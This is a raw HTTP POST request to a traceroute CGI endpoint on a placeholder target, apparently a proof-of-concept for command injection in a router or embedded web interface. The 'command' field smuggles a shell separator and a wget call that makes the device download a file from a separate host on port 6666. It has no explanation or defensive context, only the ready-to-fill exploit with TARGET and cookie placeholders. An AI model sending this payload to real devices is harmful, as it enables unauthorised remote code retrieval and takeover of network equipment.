POST /cgi-bin/traceroute.cgi HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:144.0) Gecko/20100101 Firefox/144.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 89
Origin: http://TARGET
Connection: keep-alive
Referer: http://TARGET/
Cookie: Authorization=REPLACE_ME

topicurl=setTracerouteCfg&command=;wget http://192.168.100.254:6666/testpoc;&ip=127.0.0.1